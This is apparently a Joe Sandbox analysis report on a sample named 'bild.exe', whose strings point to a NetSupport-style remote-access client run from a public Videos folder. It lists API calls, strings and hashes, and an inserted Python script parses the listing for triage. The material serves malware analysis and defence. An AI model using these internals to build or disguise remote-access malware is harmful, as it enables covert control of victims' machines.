                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Cursor$Destroy$Load
                                                                                    • String ID:
                                                                                    • API String ID: 3167891023-0
                                                                                    APIs
                                                                                      • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                      • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                      • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                    • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 110072F7
                                                                                    • SetFocus.USER32(?), ref: 11007353
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: CreateFocusWindow_malloc_memsetwsprintf
                                                                                    • String ID: edit
                                                                                    • API String ID: 1305092643-2167791130
                                                                                    APIs
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 11009265
                                                                                    • _memmove.LIBCMT ref: 110092B6
                                                                                      • Part of subcall function 11008D50: std::_Xinvalid_argument.LIBCPMT ref: 11008D6A
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                    • String ID: string too long
                                                                                    • API String ID: 2168136238-2556327735
                                                                                    APIs
                                                                                      • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                      • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                      • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                    • std::exception::exception.LIBCMT ref: 1108F38C
                                                                                    • __CxxThrowException@8.LIBCMT ref: 1108F3A1
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                    • String ID: L
                                                                                    • API String ID: 1338273076-2909332022
                                                                                    APIs
                                                                                    • std::exception::exception.LIBCMT ref: 11041413
                                                                                    • __CxxThrowException@8.LIBCMT ref: 11041421
                                                                                    Strings
                                                                                    • VolumeControl exception : %hs, xrefs: 11041431
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throwstd::exception::exception
                                                                                    • String ID: VolumeControl exception : %hs
                                                                                    • API String ID: 3728558374-910296547
                                                                                    APIs
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F27B
                                                                                      • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 111603F8
                                                                                      • Part of subcall function 111603E3: __CxxThrowException@8.LIBCMT ref: 1116040D
                                                                                      • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 1116041E
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F292
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                    • String ID: string too long
                                                                                    • API String ID: 963545896-2556327735
                                                                                    APIs
                                                                                    • ShowWindow.USER32(8D111939,00000009,?,?,?,?,?,?,?,?,?,?,110BA3E6,110BFEBC), ref: 110B92CB
                                                                                      • Part of subcall function 110B8610: GetSystemMetrics.USER32(0000004C), ref: 110B8642
                                                                                      • Part of subcall function 110B8610: GetSystemMetrics.USER32(0000004D), ref: 110B8649
                                                                                      • Part of subcall function 110B8610: GetSystemMetrics.USER32(0000004E), ref: 110B8650
                                                                                      • Part of subcall function 110B8610: GetSystemMetrics.USER32(0000004F), ref: 110B8657
                                                                                      • Part of subcall function 110B8610: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B8666
                                                                                      • Part of subcall function 110B8610: GetSystemMetrics.USER32(?), ref: 110B8674
                                                                                      • Part of subcall function 110B8610: GetSystemMetrics.USER32(00000001), ref: 110B8683
                                                                                    • MoveWindow.USER32(8D111939,?,?,?,?,00000001), ref: 110B92F3
                                                                                    Strings
                                                                                    • j CB::OnRemoteSizeRestore(%d, %d, %d, %d), xrefs: 110B930D
                                                                                    Similarity
                                                                                    • API ID: System$Metrics$Window$InfoMoveParametersShow
                                                                                    • String ID: j CB::OnRemoteSizeRestore(%d, %d, %d, %d)
                                                                                    • API String ID: 2940908497-693965840
                                                                                    APIs
                                                                                      • Part of subcall function 11143C20: GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                      • Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Public\Videos\Video\bild.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                    • _memmove.LIBCMT ref: 11147211
                                                                                    Strings
                                                                                    • Failed to get callstack, xrefs: 111471BD
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CurrentFileModuleNameProcess_memmove
                                                                                    • String ID: Failed to get callstack
                                                                                    • API String ID: 4135527288-766476014
                                                                                    APIs
                                                                                    • RegQueryValueExA.ADVAPI32(00020019,?,00000000,420B7E12,00000000,00020019,?,00000000), ref: 110ED280
                                                                                      • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                    Strings
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: QueryValuewvsprintf
                                                                                    • String ID: ($Error %d getting %s
                                                                                    • API String ID: 141982866-3697087921
                                                                                    APIs
                                                                                    • wvsprintfA.USER32(?,?,00000000), ref: 110D1322
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                    • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                    • API String ID: 175691280-2052047905
                                                                                    APIs
                                                                                    • wvsprintfA.USER32(?,?,1102C511), ref: 110D139B
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                    • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                    • API String ID: 175691280-2052047905
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D404
                                                                                    • SetLastError.KERNEL32(00000078,00000000,?,1109E29C,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D42D
                                                                                    Strings
                                                                                    • ConvertStringSecurityDescriptorToSecurityDescriptorA, xrefs: 1109D3FE
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressErrorLastProc
                                                                                    • String ID: ConvertStringSecurityDescriptorToSecurityDescriptorA
                                                                                    • API String ID: 199729137-262600717
                                                                                    APIs
                                                                                      • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                    • CreateThread.KERNEL32(00000000,00000000,11026ED0,00000000,00000000,00000000), ref: 110291BE
                                                                                    Strings
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateThread__wcstoi64
                                                                                    • String ID: *TapiFixPeriod$Bridge
                                                                                    • API String ID: 1152747075-2058455932
                                                                                    APIs
                                                                                    • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010B7
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    • m_hWnd, xrefs: 11001096
                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001091
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                     • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                    • API String ID: 2046328329-2830328467
                                                                                    • Opcode ID: 870a264c4857fd7c20b43c7043125336c03270db109b755264ed45be6d9d6118
                                                                                    • Instruction ID: 77f34a7b6d351dc7c2bdf78fd4e91b5ab9e9d0feae3f5383371c0572f9fc60e5
                                                                                    • Opcode Fuzzy Hash: 870a264c4857fd7c20b43c7043125336c03270db109b755264ed45be6d9d6118
                                                                                    • Instruction Fuzzy Hash: 98E01ABA71025DBFD714CE95EC81EE7B3ACEB48364F008529FA2997640D6B0E85087A1
                                                                                    APIs
                                                                                    • SendMessageA.USER32(?,?,?,?), ref: 11001073
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    • m_hWnd, xrefs: 11001056
                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001051
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                     • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                    • API String ID: 819365019-2830328467
                                                                                    • Opcode ID: 46c3cce5aab5cc82a9d8ff0d4253417d22b235869f514457b0a8909ae4eb1d0c
                                                                                    • Instruction ID: cf35a841ff9db8a25d072bdd62e9da3c8eef3a8b3e547f8f1cf52fd96b7d4918
                                                                                    • Opcode Fuzzy Hash: 46c3cce5aab5cc82a9d8ff0d4253417d22b235869f514457b0a8909ae4eb1d0c
                                                                                    • Instruction Fuzzy Hash: 3CE04FB570021DABD310CA95DC85ED7B39CEB54354F008429F92887600D6B0F89087A0
                                                                                    APIs
                                                                                    • PostMessageA.USER32(?,?,?,?), ref: 11001103
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    • m_hWnd, xrefs: 110010E6
                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                     • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                    • API String ID: 906220102-2830328467
                                                                                    • Opcode ID: 27df700c695a826ec584c3a5c6c16cda0f02aa3721c02321218cde4e7ec8e80e
                                                                                    • Instruction ID: e326bc5325dc434b8864e09602644acab64ba33727794dfa8c4f249b36814fc9
                                                                                    • Opcode Fuzzy Hash: 27df700c695a826ec584c3a5c6c16cda0f02aa3721c02321218cde4e7ec8e80e
                                                                                    • Instruction Fuzzy Hash: 81E04FB970025DAFD314CA95DC45ED6B3ACEB54764F008429F92887600DA70F84087A0
                                                                                    APIs
                                                                                    • ShowWindow.USER32(?,?), ref: 1100113B
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    • m_hWnd, xrefs: 11001126
                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001121
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                     • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                    • API String ID: 1604732272-2830328467
                                                                                    • Opcode ID: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
                                                                                    • Instruction ID: 825df7ee52a795a689a6901b0494195ba864db9fe7d9b2cdbf909eadc0dc9b6b
                                                                                    • Opcode Fuzzy Hash: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
                                                                                    • Instruction Fuzzy Hash: 4ED02BB561031CABC314DA92DC41FD2F38CAB20364F004435F52542500D571F54083A4
                                                                                    APIs
                                                                                    • KillTimer.USER32(?,?), ref: 1100102B
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    • m_hWnd, xrefs: 11001016
                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                     • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                    • API String ID: 2229609774-2830328467
                                                                                    • Opcode ID: 76242f1f7a5656083f48ec4c6fb46d4250b195dfa3fd92ba0bbd6b47707e0e7b
                                                                                    • Instruction ID: d507351e39c60ba8400a42a64aee1b3b281c2e630578985a984e8bb8925e1fd6
                                                                                    • Opcode Fuzzy Hash: 76242f1f7a5656083f48ec4c6fb46d4250b195dfa3fd92ba0bbd6b47707e0e7b
                                                                                    • Instruction Fuzzy Hash: 21D02B76B4031DABD310C691DC44FD2F39CD714364F008035F55446500D570F8408390
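The entries above share one shape: a thin USER32 wrapper (SendDlgItemMessageA, SendMessageA, PostMessageA, ShowWindow, KillTimer) whose failure path runs through subcall function 11029450 (GetLastError, wsprintfA, MessageBoxA with the caption Client32, ExitProcess), and whose Strings block names the same build-tree header and the m_hWnd member. The following Python is an added example, not part of the Joe Sandbox report and not code from the analysed sample: it parses entries laid out in this page's format and groups the wrapped APIs by the fatal-exit subcall they share, so a triage analyst can see at a glance which MessageBoxA references are the same error handler rather than separate behaviours. The SAMPLE text is constructed from entries shown on this page; the assumption that a new entry begins at each APIs heading is mine, as is the set of section headings recognised.

```python
"""Parse Joe Sandbox per-function entries and group wrappers by shared fatal-exit subcall."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: three entries in the page's layout (two m_hWnd wrappers, one without APIs).
SAMPLE = r"""APIs
• SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010B7
  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
Strings
• m_hWnd, xrefs: 11001096
• e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001091
Memory Dump Source
• Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Similarity
• API ID: Message$ErrorExitItemLastProcessSendwsprintf
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
• API String ID: 2046328329-2830328467
APIs
• KillTimer.USER32(?,?), ref: 1100102B
  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
Strings
• m_hWnd, xrefs: 11001016
• e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
Similarity
• API ID: ErrorExitKillLastMessageProcessTimerwsprintf
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
• API String ID: 2229609774-2830328467
APIs
Strings
Similarity
• API ID: _strncpy
• String ID: 1000,50$1000,50
• API String ID: 2961919466-2776873633
"""

# Section headings as they appear in the report (assumed set; an entry starts at each "APIs").
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Yara matches", "Similarity"}
# "• [Part of subcall function ADDR: ]Name.MODULE[(args)][,] ref: ADDR"
API_RE = re.compile(r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
                    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
STR_RE = re.compile(r"^•\s*(?P<text>.*), xrefs: (?P<ref>[0-9A-F]+)$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+): (?P<val>.*)$")


@dataclass
class Call:
    name: str
    module: str
    ref: str
    subcall: Optional[str]  # address of the subcall function, None for a direct call


@dataclass
class FuncEntry:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)     # (text, xref address)
    similarity: dict = field(default_factory=dict)  # API ID / String ID / API String ID ...


def parse_entries(text):
    """Split report text into FuncEntry records, one per APIs heading."""
    entries, section, cur = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":
                cur = FuncEntry()
                entries.append(cur)
            section = line
            continue
        if cur is None:
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            cur.calls.append(Call(m["name"], m["mod"], m["ref"], m["sub"]))
        elif section == "Strings" and (m := STR_RE.match(line)):
            cur.strings.append((m["text"], m["ref"]))
        elif section == "Similarity" and (m := KV_RE.match(line)):
            cur.similarity[m["key"]] = m["val"]
    return entries


def fatal_exit_subcalls(entry):
    """Subcall addresses whose chain ends in ExitProcess: the caller treats failure as fatal."""
    chains = {}
    for c in entry.calls:
        if c.subcall:
            chains.setdefault(c.subcall, []).append(c.name)
    return {addr for addr, names in chains.items() if names[-1] == "ExitProcess"}


def group_by_error_handler(entries):
    """Map each fatal-exit subcall address to the top-level APIs that funnel into it."""
    out = {}
    for e in entries:
        direct = [c.name for c in e.calls if c.subcall is None]
        for addr in fatal_exit_subcalls(e):
            out.setdefault(addr, []).extend(direct)
    return out


def source_paths(entries):
    """Distinct build-tree paths found in Strings blocks (useful as a build/version fingerprint)."""
    return sorted({s for e in entries for s, _ in e.strings if re.match(r"^[a-z]:\\", s, re.I)})


def api_string_ids(entries):
    return [e.similarity.get("API String ID") for e in entries]


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    print(group_by_error_handler(parsed))
    print(source_paths(parsed))
```

Run against a saved copy of the function listing, the handler map shows that every wrapper in this section reaches the same ExitProcess path, so the MessageBoxA/ExitProcess pair counts as one error routine when weighing the report's behaviour signatures; the source-path list gives a stable string to pivot on across samples of the same build.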
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                     • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
